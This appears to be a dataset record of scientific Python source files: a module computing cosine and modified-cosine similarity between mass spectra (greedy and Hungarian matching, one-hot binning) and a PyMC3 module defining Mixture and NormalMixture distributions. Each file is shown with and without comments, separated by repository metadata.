spec2: Spectrum peaks and intensities as numpy array.
mass_shift: float
Difference in parent mass of both spectra to account for. Set to 'None'
when no shifting is desired --> back to normal cosine score.
tol: float
Tolerance value to define how far two peaks can be apart to still count as match.
min_intens: float
Minimum intensity (relative to max.intensity peak in spectrum). Peaks with lower
intensity will be ignored --> higher min_intens is faster, but less precise.
"""
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
# Normalize intensities:
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
# Filter, if wanted:
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
# Use Hungarian_algorithm:
used_matches = []
list1 = list(set([x[0] for x in matching_pairs]))
list2 = list(set([x[1] for x in matching_pairs]))
matrix_size = (len(list1), len(list2))
matrix = np.ones(matrix_size)
if len(matching_pairs) > 0:
for m in matching_pairs:
matrix[list1.index(m[0]), list2.index(m[1])] = 1 - m[2]
# Use hungarian agorithm to solve the linear sum assignment problem
row_ind, col_ind = linear_sum_assignment(matrix)
score = len(row_ind) - matrix[row_ind, col_ind].sum()
used_matches = [(list1[x], list2[y]) for (x, y) in zip(row_ind, col_ind)]
# Normalize score:
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
else:
score = 0.0
return score, used_matches
def cosine_matrix_fast(spectra,
tol,
max_mz,
min_mz=0):
"""Calculates cosine similarity matrix.
Be careful! Binning is here done by creating one-hot vectors.
It is hence really actual "bining" and different from the tolerance-based
approach used for the cosine_matrix or molnet_matrix!
Also: tol here is about tol/2 when compared to cosine_matrix or molnet_matrix...
"""
for i, spectrum in enumerate(spectra):
spec = np.array(spectrum.peaks.copy(), dtype=float)
# Normalize intensities:
spec[:, 1] = spec[:, 1]/np.max(spec[:, 1])
if i == 0:
vector = one_hot_spectrum(spec, tol, max_mz, shift=0, min_mz=min_mz, method='max')
spec_vectors = np.zeros((len(spectra), vector.shape[0]))
spec_vectors[0, :] = vector
else:
spec_vectors[i, :] = one_hot_spectrum(spec, tol,
max_mz, shift=0,
min_mz=min_mz,
method='max')
Cdist = spatial.distance.cdist(spec_vectors, spec_vectors, 'cosine')
return 1 - Cdist
def cosine_score_matrix(spectra,
tol,
max_mz=1000.0,
# min_mz=0,
min_intens=0,
mass_shifting=False,
method='hungarian',
num_workers=4,
filename=None,
safety_points=None):
"""Create Matrix of all modified cosine similarities.
Takes some time to calculate, so better only do it once and save as npy.
Now implemented: parallelization of code using concurrent.futures and numba options.
spectra: list
List of spectra (of Spectrum class)
tol: float
Tolerance to still count peaks a match (mz +- tolerance).
max_mz: float
Maxium m-z mass to take into account
#min_mz: float
# Minimum m-z mass to take into account
min_intens: float
Sets the minimum relative intensity peaks must have to be looked at for
potential matches.
mass_shifting: bool
Set to 'True' if mass difference between spectra should be accounted for
--> "modified cosine" score
Set to 'False' for --> "normal cosine" score
method: 'greedy', 'greedy-numba', 'hungarian'
"greedy" will use Simon's molnet scoring which is faster than hungarian,
but not 100% accurate
regarding the weighted bipartite matching problem.
"hungarian" will use the Hungarian algorithm, which is more accurate.
Since its slower, numba is used here to compile in time.
"greedy-numba" will use a (partly) numba compiled version of greedy.
Much faster, but needs numba.
num_workers: int
Number of threads to use for calculation.
filename: str/ None
Filename to look for existing npy-file with molent matrix. Or, if not
found, to use to save the newly calculated matrix.
safety_points: int
Number of safety points, i.e. number of times the modcos-matrix is saved
during process. Set to 'None' to avoid saving matrix on the way.
"""
if filename is not None:
if filename[-4:] != '.npy':
filename = filename + '.npy'
# Try loading saved data
try:
print("Loading similarity scores from", filename)
modcos_sim = np.load(filename)
print("Loading min_match values from", filename[:-4]+ "_matches.npy")
modcos_matches = np.load(filename[:-4] + "_matches.npy")
# Check if matrix was calculated to the end:
diagonal = modcos_sim.diagonal()
if np.min(diagonal) == 0:
print("Uncomplete cosine similarity scores found and loaded.")
missing_scores = np.where(diagonal == 0)[0].astype(int)
print("Missing cosine scores will be calculated.")
counter_total = int((len(spectra)**2)/2)
counter_init = counter_total - np.sum(len(spectra) - missing_scores)
print("About ", 100*(counter_init/counter_total),
"% of the values already completed.")
collect_new_data = True
else:
print("Complete cosine similarity scores found and loaded.")
missing_scores = []
counter_init = 0
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename, "or file",
filename[:-4] + "_matches.npy")
if mass_shifting:
print("Modified cosine scores will be calculated from scratch.")
else:
print("Cosine scores will be calculated from scratch.")
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
else:
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
if collect_new_data:
if counter_init == 0:
modcos_sim = np.zeros((len(spectra), len(spectra)))
modcos_matches = np.zeros((len(spectra), len(spectra)))
counter = counter_init
if safety_points is not None:
# Save modcos-matrix along process
safety_save = int(((len(spectra)**2)/2)/safety_points)
print("Calculate pairwise scores by", num_workers, "number of workers.")
for i in missing_scores: #range(n_start, len(spectra)):
spec1 = np.array(spectra[i].peaks, dtype=float)
spec1 = spec1[spec1[:, 0] < max_mz, :]
parameter_collection = []
for j in range(i, len(spectra)):
spec2 = np.array(spectra[j].peaks, dtype=float)
spec2 = spec2[spec2[:, 0] < max_mz, :]
if mass_shifting:
mass_shift = spectra[i].parent_mz - spectra[j].parent_mz
else:
mass_shift = None
parameter_collection.append([spec1, spec2, i, j,
mass_shift, tol, min_intens,
method, counter])
counter += 1
# Create a pool of processes. For instance one for each CPU in your machine.
modcos_pairs = []
with ThreadPoolExecutor(max_workers=num_workers) as executor:
futures = [executor.submit(modcos_pair, X, len(spectra)) for X in parameter_collection]
modcos_pairs.append(futures)
for m, future in enumerate(modcos_pairs[0]):
_, _, ind_i, ind_j, _, _, _, _, counting = parameter_collection[m]
modcos_sim[ind_i, ind_j] = future.result()[0]
modcos_matches[ind_i, ind_j] = future.result()[1]
if filename is not None \
and safety_points is not None:
if (counting+1) % safety_save == 0:
np.save(filename, modcos_sim)
np.save(filename[:-4] + "_matches.npy", modcos_matches)
# Symmetric matrix --> fill
for i in range(1, len(spectra)):
for j in range(i):
modcos_sim[i, j] = modcos_sim[j, i]
modcos_matches[i, j] = modcos_matches[j, i]
# Save final results
if filename is not None:
np.save(filename, modcos_sim)
np.save(filename[:-4]+ "_matches.npy", modcos_matches)
return modcos_sim, modcos_matches
def modcos_pair(X, len_spectra):
"""Single molnet pair calculation
"""
spectra_i, spectra_j, i, j, mass_shift, tol, min_intens, method, counter = X
if method == 'greedy':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=False)
elif method == 'greedy-numba':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=True)
elif method == 'hungarian':
molnet_pair, used_matches = cosine_score_hungarian(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens)
else:
print("Given method does not exist...")
if (counter+1) % 1000 == 0 or counter == len_spectra-1:
print('\r',
' Calculated MolNet for pair {} -- {}'.format(i, j),
'. ( ', np.round(200*(counter+1)/len_spectra**2, 2), ' % done).',
end="")
return molnet_pair, len(used_matches)
def one_hot_spectrum(spec,
tol,
max_mz,
shift=0,
min_mz=0,
method='max'):
"""Convert spectrum peaks into on-hot-vector
method: str
'max' take highest intensity peak within every bin.
'sum' take sum of all peaks within every bin.
"""
dim_vector = int((max_mz - min_mz)/tol)
one_hot_spec = np.zeros((dim_vector))
idx = ((spec[:, 0] + shift)*1/tol).astype(int)
idx[idx >= dim_vector] = 0
idx[idx < 0] = 0
if method == 'max':
for id1 in set(idx):
one_hot_spec[id1] = np.max(spec[(idx == id1), 1])
elif method == 'sum':
for id1 in set(idx):
one_hot_spec[id1] = np.sum(spec[(idx == id1), 1])
else:
print("Method not known...")
return one_hot_spec
@numba.njit
def find_pairs_numba(spec1, spec2, tol, shift=0):
"""Find matching pairs between two spectra.
Args
----
spec1 : list of tuples
List of (mz, intensity) tuples.
spec2 : list of tuples
List of (mz, intensity) tuples.
tol : float
Tolerance. Peaks will be considered a match when < tol appart.
shift : float, optional
Shift spectra peaks by shift. The default is 0.
Returns
-------
matching_pairs : list
List of found matching peaks.
"""
matching_pairs = []
for idx in range(len(spec1)):
intensity = spec1[idx, 1]
matches = np.where((np.abs(spec2[:, 0] - spec1[idx, 0] + shift) <= tol))[0]
for match in matches:
matching_pairs.append((idx, match, intensity*spec2[match][1]))
return matching_pairs
def find_pairs(spec1, spec2, tol, shift=0):
"""Find matching pairs between two spectra.
Args
----
spec1 : list of tuples
List of (mz, intensity) tuples.
spec2 : list of tuples
List of (mz, intensity) tuples.
tol : float
Tolerance. Peaks will be considered a match when < tol appart.
shift : float, optional
Shift spectra peaks by shift. The default is 0.
Returns
-------
matching_pairs : list
List of found matching peaks.
"""
# Sort peaks and losses by m/z
spec1 = spec1[np.lexsort((spec1[:, 1], spec1[:, 0])), :]
spec2 = spec2[np.lexsort((spec2[:, 1], spec2[:, 0])), :]
matching_pairs = []
spec2lowpos = 0
spec2length = len(spec2)
for idx in range(len(spec1)):
mz = spec1[idx, 0]
intensity = spec1[idx, 1]
# Do we need to increase the lower idx?
while spec2lowpos < spec2length and spec2[spec2lowpos][0] + shift < mz - tol:
spec2lowpos += 1
if spec2lowpos == spec2length:
break
spec2pos = spec2lowpos
while(spec2pos < spec2length and spec2[spec2pos][0] + shift < mz + tol):
matching_pairs.append((idx, spec2pos, intensity * spec2[spec2pos][1]))
spec2pos += 1
return matching_pairs
| 37.783688
| 103
| 0.57114
|
import numba
import numpy as np
from scipy.optimize import linear_sum_assignment
from scipy import spatial
from concurrent.futures import ThreadPoolExecutor
def mol_sim_matrix(fingerprints1,
fingerprints2,
method='cosine',
filename=None,
max_size=1000,
print_progress=True):
if filename is not None:
try:
molecular_similarities = np.load(filename)
print("Molecular similarity scores found and loaded.")
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename)
print("Molecular scores will be calculated from scratch.")
collect_new_data = True
else:
collect_new_data = True
if collect_new_data:
fingerprints_arr1 = np.array(fingerprints1)
fingerprints_arr2 = np.array(fingerprints2)
matrix_size = (fingerprints_arr1.shape[0], fingerprints_arr2.shape[0])
molecular_similarities = np.zeros(matrix_size)
splits = int(np.ceil(matrix_size[0]/max_size) * np.ceil(matrix_size[1]/max_size))
count_splits = 0
for i in range(int(np.ceil(matrix_size[0]/max_size))):
low1 = i * max_size
high1 = min((i + 1) * max_size, matrix_size[0])
for j in range(int(np.ceil(matrix_size[1]/max_size))):
low2 = j * max_size
high2 = min((j + 1) * max_size, matrix_size[1])
molecular_similarities[low1:high1, low2:high2] = 1 - spatial.distance.cdist(
fingerprints_arr1[low1:high1],
fingerprints_arr2[low2:high2],
method
)
count_splits += 1
if print_progress:
print('\r',
"Calculated submatrix {} out of {}".format(count_splits, splits),
end="")
if print_progress:
print(20 * '--')
print("Succesfully calculated matrix with all-vs-all molecular similarity values.")
if filename is not None:
np.save(filename, molecular_similarities)
print("Matrix was saved under:", filename)
return molecular_similarities
def cosine_score_greedy(spec1,
spec2,
mass_shift,
tol,
min_intens=0,
use_numba=True):
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
if use_numba:
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
else:
zero_pairs = find_pairs(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
if use_numba:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
else:
nonzero_pairs = find_pairs(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
used1 = set()
used2 = set()
score = 0.0
used_matches = []
for m in matching_pairs:
if not m[0] in used1 and not m[1] in used2:
score += m[2]
used1.add(m[0])
used2.add(m[1])
used_matches.append(m)
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
return score, used_matches
def cosine_score_hungarian(spec1,
spec2,
mass_shift,
tol,
min_intens=0):
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
used_matches = []
list1 = list(set([x[0] for x in matching_pairs]))
list2 = list(set([x[1] for x in matching_pairs]))
matrix_size = (len(list1), len(list2))
matrix = np.ones(matrix_size)
if len(matching_pairs) > 0:
for m in matching_pairs:
matrix[list1.index(m[0]), list2.index(m[1])] = 1 - m[2]
row_ind, col_ind = linear_sum_assignment(matrix)
score = len(row_ind) - matrix[row_ind, col_ind].sum()
used_matches = [(list1[x], list2[y]) for (x, y) in zip(row_ind, col_ind)]
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
else:
score = 0.0
return score, used_matches
def cosine_matrix_fast(spectra,
tol,
max_mz,
min_mz=0):
for i, spectrum in enumerate(spectra):
spec = np.array(spectrum.peaks.copy(), dtype=float)
spec[:, 1] = spec[:, 1]/np.max(spec[:, 1])
if i == 0:
vector = one_hot_spectrum(spec, tol, max_mz, shift=0, min_mz=min_mz, method='max')
spec_vectors = np.zeros((len(spectra), vector.shape[0]))
spec_vectors[0, :] = vector
else:
spec_vectors[i, :] = one_hot_spectrum(spec, tol,
max_mz, shift=0,
min_mz=min_mz,
method='max')
Cdist = spatial.distance.cdist(spec_vectors, spec_vectors, 'cosine')
return 1 - Cdist
def cosine_score_matrix(spectra,
tol,
max_mz=1000.0,
min_intens=0,
mass_shifting=False,
method='hungarian',
num_workers=4,
filename=None,
safety_points=None):
if filename is not None:
if filename[-4:] != '.npy':
filename = filename + '.npy'
try:
print("Loading similarity scores from", filename)
modcos_sim = np.load(filename)
print("Loading min_match values from", filename[:-4]+ "_matches.npy")
modcos_matches = np.load(filename[:-4] + "_matches.npy")
diagonal = modcos_sim.diagonal()
if np.min(diagonal) == 0:
print("Uncomplete cosine similarity scores found and loaded.")
missing_scores = np.where(diagonal == 0)[0].astype(int)
print("Missing cosine scores will be calculated.")
counter_total = int((len(spectra)**2)/2)
counter_init = counter_total - np.sum(len(spectra) - missing_scores)
print("About ", 100*(counter_init/counter_total),
"% of the values already completed.")
collect_new_data = True
else:
print("Complete cosine similarity scores found and loaded.")
missing_scores = []
counter_init = 0
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename, "or file",
filename[:-4] + "_matches.npy")
if mass_shifting:
print("Modified cosine scores will be calculated from scratch.")
else:
print("Cosine scores will be calculated from scratch.")
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
else:
collect_new_data = True
missing_scores = np.arange(0, len(spectra))
counter_init = 0
if collect_new_data:
if counter_init == 0:
modcos_sim = np.zeros((len(spectra), len(spectra)))
modcos_matches = np.zeros((len(spectra), len(spectra)))
counter = counter_init
if safety_points is not None:
safety_save = int(((len(spectra)**2)/2)/safety_points)
print("Calculate pairwise scores by", num_workers, "number of workers.")
for i in missing_scores:
spec1 = np.array(spectra[i].peaks, dtype=float)
spec1 = spec1[spec1[:, 0] < max_mz, :]
parameter_collection = []
for j in range(i, len(spectra)):
spec2 = np.array(spectra[j].peaks, dtype=float)
spec2 = spec2[spec2[:, 0] < max_mz, :]
if mass_shifting:
mass_shift = spectra[i].parent_mz - spectra[j].parent_mz
else:
mass_shift = None
parameter_collection.append([spec1, spec2, i, j,
mass_shift, tol, min_intens,
method, counter])
counter += 1
modcos_pairs = []
with ThreadPoolExecutor(max_workers=num_workers) as executor:
futures = [executor.submit(modcos_pair, X, len(spectra)) for X in parameter_collection]
modcos_pairs.append(futures)
for m, future in enumerate(modcos_pairs[0]):
_, _, ind_i, ind_j, _, _, _, _, counting = parameter_collection[m]
modcos_sim[ind_i, ind_j] = future.result()[0]
modcos_matches[ind_i, ind_j] = future.result()[1]
if filename is not None \
and safety_points is not None:
if (counting+1) % safety_save == 0:
np.save(filename, modcos_sim)
np.save(filename[:-4] + "_matches.npy", modcos_matches)
for i in range(1, len(spectra)):
for j in range(i):
modcos_sim[i, j] = modcos_sim[j, i]
modcos_matches[i, j] = modcos_matches[j, i]
if filename is not None:
np.save(filename, modcos_sim)
np.save(filename[:-4]+ "_matches.npy", modcos_matches)
return modcos_sim, modcos_matches
def modcos_pair(X, len_spectra):
spectra_i, spectra_j, i, j, mass_shift, tol, min_intens, method, counter = X
if method == 'greedy':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=False)
elif method == 'greedy-numba':
molnet_pair, used_matches = cosine_score_greedy(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens,
use_numba=True)
elif method == 'hungarian':
molnet_pair, used_matches = cosine_score_hungarian(spectra_i, spectra_j,
mass_shift, tol,
min_intens=min_intens)
else:
print("Given method does not exist...")
if (counter+1) % 1000 == 0 or counter == len_spectra-1:
print('\r',
' Calculated MolNet for pair {} -- {}'.format(i, j),
'. ( ', np.round(200*(counter+1)/len_spectra**2, 2), ' % done).',
end="")
return molnet_pair, len(used_matches)
def one_hot_spectrum(spec,
tol,
max_mz,
shift=0,
min_mz=0,
method='max'):
dim_vector = int((max_mz - min_mz)/tol)
one_hot_spec = np.zeros((dim_vector))
idx = ((spec[:, 0] + shift)*1/tol).astype(int)
idx[idx >= dim_vector] = 0
idx[idx < 0] = 0
if method == 'max':
for id1 in set(idx):
one_hot_spec[id1] = np.max(spec[(idx == id1), 1])
elif method == 'sum':
for id1 in set(idx):
one_hot_spec[id1] = np.sum(spec[(idx == id1), 1])
else:
print("Method not known...")
return one_hot_spec
@numba.njit
def find_pairs_numba(spec1, spec2, tol, shift=0):
matching_pairs = []
for idx in range(len(spec1)):
intensity = spec1[idx, 1]
matches = np.where((np.abs(spec2[:, 0] - spec1[idx, 0] + shift) <= tol))[0]
for match in matches:
matching_pairs.append((idx, match, intensity*spec2[match][1]))
return matching_pairs
def find_pairs(spec1, spec2, tol, shift=0):
spec1 = spec1[np.lexsort((spec1[:, 1], spec1[:, 0])), :]
spec2 = spec2[np.lexsort((spec2[:, 1], spec2[:, 0])), :]
matching_pairs = []
spec2lowpos = 0
spec2length = len(spec2)
for idx in range(len(spec1)):
mz = spec1[idx, 0]
intensity = spec1[idx, 1]
while spec2lowpos < spec2length and spec2[spec2lowpos][0] + shift < mz - tol:
spec2lowpos += 1
if spec2lowpos == spec2length:
break
spec2pos = spec2lowpos
while(spec2pos < spec2length and spec2[spec2pos][0] + shift < mz + tol):
matching_pairs.append((idx, spec2pos, intensity * spec2[spec2pos][1]))
spec2pos += 1
return matching_pairs
| true
| true
|
790db8ba305a6bee2517597e27a90ff727edd601
| 7,725
|
py
|
Python
|
pymc3/distributions/mixture.py
|
rsumner31/pymc3-2
|
e824294ddfb45610536cad07394b8c290904c38d
|
[
"Apache-2.0"
] | null | null | null |
pymc3/distributions/mixture.py
|
rsumner31/pymc3-2
|
e824294ddfb45610536cad07394b8c290904c38d
|
[
"Apache-2.0"
] | null | null | null |
pymc3/distributions/mixture.py
|
rsumner31/pymc3-2
|
e824294ddfb45610536cad07394b8c290904c38d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import theano.tensor as tt
from pymc3.util import get_variable_name
from ..math import logsumexp
from .dist_math import bound
from .distribution import Discrete, Distribution, draw_values, generate_samples
from .continuous import get_tau_sd, Normal
def all_discrete(comp_dists):
"""
Determine if all distributions in comp_dists are discrete
"""
if isinstance(comp_dists, Distribution):
return isinstance(comp_dists, Discrete)
else:
return all(isinstance(comp_dist, Discrete) for comp_dist in comp_dists)
class Mixture(Distribution):
R"""
Mixture log-likelihood
Often used to model subpopulation heterogeneity
.. math:: f(x \mid w, \theta) = \sum_{i = 1}^n w_i f_i(x \mid \theta_i)
======== ============================================
Support :math:`\cap_{i = 1}^n \textrm{support}(f_i)`
Mean :math:`\sum_{i = 1}^n w_i \mu_i`
======== ============================================
Parameters
----------
w : array of floats
w >= 0 and w <= 1
the mixture weights
comp_dists : multidimensional PyMC3 distribution (e.g. `pm.Poisson.dist(...)`)
or iterable of one-dimensional PyMC3 distributions the
component distributions :math:`f_1, \ldots, f_n`
Example
-------
.. code-block:: python
# 2-Mixture Poisson distribution
with pm.Model() as model:
lam = pm.Exponential('lam', lam=1, shape=(2,)) # `shape=(2,)` indicates two mixtures.
# As we just need the logp, rather than add a RV to the model, we need to call .dist()
components = pm.Poisson.dist(mu=lam, shape=(2,))
w = pm.Dirichlet('w', a=np.array([1, 1])) # two mixture component weights.
like = pm.Mixture('like', w=w, comp_dists=components, observed=data)
# 2-Mixture Poisson using iterable of distributions.
with pm.Model() as model:
lam1 = pm.Exponential('lam1', lam=1)
lam2 = pm.Exponential('lam2', lam=1)
pois1 = pm.Poisson.dist(mu=lam1)
pois2 = pm.Poisson.dist(mu=lam2)
w = pm.Dirichlet('w', a=np.array([1, 1]))
like = pm.Mixture('like', w=w, comp_dists = [pois1, pois2], observed=data)
"""
def __init__(self, w, comp_dists, *args, **kwargs):
shape = kwargs.pop('shape', ())
self.w = w = tt.as_tensor_variable(w)
self.comp_dists = comp_dists
defaults = kwargs.pop('defaults', [])
if all_discrete(comp_dists):
dtype = kwargs.pop('dtype', 'int64')
else:
dtype = kwargs.pop('dtype', 'float64')
try:
self.mean = (w * self._comp_means()).sum(axis=-1)
if 'mean' not in defaults:
defaults.append('mean')
except AttributeError:
pass
try:
comp_modes = self._comp_modes()
comp_mode_logps = self.logp(comp_modes)
self.mode = comp_modes[tt.argmax(w * comp_mode_logps, axis=-1)]
if 'mode' not in defaults:
defaults.append('mode')
except AttributeError:
pass
super(Mixture, self).__init__(shape, dtype, defaults=defaults,
*args, **kwargs)
def _comp_logp(self, value):
comp_dists = self.comp_dists
try:
value_ = value if value.ndim > 1 else tt.shape_padright(value)
return comp_dists.logp(value_)
except AttributeError:
return tt.stack([comp_dist.logp(value) for comp_dist in comp_dists],
axis=1)
def _comp_means(self):
try:
return tt.as_tensor_variable(self.comp_dists.mean)
except AttributeError:
return tt.stack([comp_dist.mean for comp_dist in self.comp_dists],
axis=1)
def _comp_modes(self):
try:
return tt.as_tensor_variable(self.comp_dists.mode)
except AttributeError:
return tt.stack([comp_dist.mode for comp_dist in self.comp_dists],
axis=1)
def _comp_samples(self, point=None, size=None, repeat=None):
try:
samples = self.comp_dists.random(point=point, size=size, repeat=repeat)
except AttributeError:
samples = np.column_stack([comp_dist.random(point=point, size=size, repeat=repeat)
for comp_dist in self.comp_dists])
return np.squeeze(samples)
def logp(self, value):
w = self.w
return bound(logsumexp(tt.log(w) + self._comp_logp(value), axis=-1).sum(),
w >= 0, w <= 1, tt.allclose(w.sum(axis=-1), 1),
broadcast_conditions=False)
def random(self, point=None, size=None, repeat=None):
def random_choice(*args, **kwargs):
w = kwargs.pop('w')
w /= w.sum(axis=-1, keepdims=True)
k = w.shape[-1]
if w.ndim > 1:
return np.row_stack([np.random.choice(k, p=w_) for w_ in w])
else:
return np.random.choice(k, p=w, *args, **kwargs)
w = draw_values([self.w], point=point)[0]
w_samples = generate_samples(random_choice,
w=w,
broadcast_shape=w.shape[:-1] or (1,),
dist_shape=self.shape,
size=size).squeeze()
comp_samples = self._comp_samples(point=point, size=size, repeat=repeat)
if comp_samples.ndim > 1:
return np.squeeze(comp_samples[np.arange(w_samples.size), w_samples])
else:
return np.squeeze(comp_samples[w_samples])
class NormalMixture(Mixture):
R"""
Normal mixture log-likelihood
.. math::
f(x \mid w, \mu, \sigma^2) = \sum_{i = 1}^n w_i N(x \mid \mu_i, \sigma^2_i)
======== =======================================
Support :math:`x \in \mathbb{R}`
Mean :math:`\sum_{i = 1}^n w_i \mu_i`
Variance :math:`\sum_{i = 1}^n w_i^2 \sigma^2_i`
======== =======================================
Parameters
----------
w : array of floats
w >= 0 and w <= 1
the mixture weights
mu : array of floats
the component means
sd : array of floats
the component standard deviations
tau : array of floats
the component precisions
Note: You only have to pass in sd or tau, but not both.
"""
def __init__(self, w, mu, *args, **kwargs):
_, sd = get_tau_sd(tau=kwargs.pop('tau', None),
sd=kwargs.pop('sd', None))
distshape = np.broadcast(mu, sd).shape
self.mu = mu = tt.as_tensor_variable(mu)
self.sd = sd = tt.as_tensor_variable(sd)
if not distshape:
distshape = np.broadcast(mu.tag.test_value, sd.tag.test_value).shape
super(NormalMixture, self).__init__(w, Normal.dist(mu, sd=sd, shape=distshape),
*args, **kwargs)
def _repr_latex_(self, name=None, dist=None):
if dist is None:
dist = self
mu = dist.mu
w = dist.w
sd = dist.sd
name = r'\text{%s}' % name
return r'${} \sim \text{{NormalMixture}}(\mathit{{w}}={},~\mathit{{mu}}={},~\mathit{{sigma}}={})$'.format(name,
get_variable_name(w),
get_variable_name(mu),
get_variable_name(sd))
| 34.486607
| 119
| 0.535016
|
import numpy as np
import theano.tensor as tt
from pymc3.util import get_variable_name
from ..math import logsumexp
from .dist_math import bound
from .distribution import Discrete, Distribution, draw_values, generate_samples
from .continuous import get_tau_sd, Normal
def all_discrete(comp_dists):
if isinstance(comp_dists, Distribution):
return isinstance(comp_dists, Discrete)
else:
return all(isinstance(comp_dist, Discrete) for comp_dist in comp_dists)
class Mixture(Distribution):
def __init__(self, w, comp_dists, *args, **kwargs):
shape = kwargs.pop('shape', ())
self.w = w = tt.as_tensor_variable(w)
self.comp_dists = comp_dists
defaults = kwargs.pop('defaults', [])
if all_discrete(comp_dists):
dtype = kwargs.pop('dtype', 'int64')
else:
dtype = kwargs.pop('dtype', 'float64')
try:
self.mean = (w * self._comp_means()).sum(axis=-1)
if 'mean' not in defaults:
defaults.append('mean')
except AttributeError:
pass
try:
comp_modes = self._comp_modes()
comp_mode_logps = self.logp(comp_modes)
self.mode = comp_modes[tt.argmax(w * comp_mode_logps, axis=-1)]
if 'mode' not in defaults:
defaults.append('mode')
except AttributeError:
pass
super(Mixture, self).__init__(shape, dtype, defaults=defaults,
*args, **kwargs)
def _comp_logp(self, value):
comp_dists = self.comp_dists
try:
value_ = value if value.ndim > 1 else tt.shape_padright(value)
return comp_dists.logp(value_)
except AttributeError:
return tt.stack([comp_dist.logp(value) for comp_dist in comp_dists],
axis=1)
def _comp_means(self):
try:
return tt.as_tensor_variable(self.comp_dists.mean)
except AttributeError:
return tt.stack([comp_dist.mean for comp_dist in self.comp_dists],
axis=1)
def _comp_modes(self):
try:
return tt.as_tensor_variable(self.comp_dists.mode)
except AttributeError:
return tt.stack([comp_dist.mode for comp_dist in self.comp_dists],
axis=1)
def _comp_samples(self, point=None, size=None, repeat=None):
try:
samples = self.comp_dists.random(point=point, size=size, repeat=repeat)
except AttributeError:
samples = np.column_stack([comp_dist.random(point=point, size=size, repeat=repeat)
for comp_dist in self.comp_dists])
return np.squeeze(samples)
def logp(self, value):
w = self.w
return bound(logsumexp(tt.log(w) + self._comp_logp(value), axis=-1).sum(),
w >= 0, w <= 1, tt.allclose(w.sum(axis=-1), 1),
broadcast_conditions=False)
def random(self, point=None, size=None, repeat=None):
def random_choice(*args, **kwargs):
w = kwargs.pop('w')
w /= w.sum(axis=-1, keepdims=True)
k = w.shape[-1]
if w.ndim > 1:
return np.row_stack([np.random.choice(k, p=w_) for w_ in w])
else:
return np.random.choice(k, p=w, *args, **kwargs)
w = draw_values([self.w], point=point)[0]
w_samples = generate_samples(random_choice,
w=w,
broadcast_shape=w.shape[:-1] or (1,),
dist_shape=self.shape,
size=size).squeeze()
comp_samples = self._comp_samples(point=point, size=size, repeat=repeat)
if comp_samples.ndim > 1:
return np.squeeze(comp_samples[np.arange(w_samples.size), w_samples])
else:
return np.squeeze(comp_samples[w_samples])
class NormalMixture(Mixture):
def __init__(self, w, mu, *args, **kwargs):
_, sd = get_tau_sd(tau=kwargs.pop('tau', None),
sd=kwargs.pop('sd', None))
distshape = np.broadcast(mu, sd).shape
self.mu = mu = tt.as_tensor_variable(mu)
self.sd = sd = tt.as_tensor_variable(sd)
if not distshape:
distshape = np.broadcast(mu.tag.test_value, sd.tag.test_value).shape
super(NormalMixture, self).__init__(w, Normal.dist(mu, sd=sd, shape=distshape),
*args, **kwargs)
def _repr_latex_(self, name=None, dist=None):
if dist is None:
dist = self
mu = dist.mu
w = dist.w
sd = dist.sd
name = r'\text{%s}' % name
return r'${} \sim \text{{NormalMixture}}(\mathit{{w}}={},~\mathit{{mu}}={},~\mathit{{sigma}}={})$'.format(name,
get_variable_name(w),
get_variable_name(mu),
get_variable_name(sd))
| true
| true
|
790db9c95aa81be22336050a55df0924b1114b92
| 2,080
|
py
|
Python
|
Clients/ParaView/Testing/Python/AppendAttributes.py
|
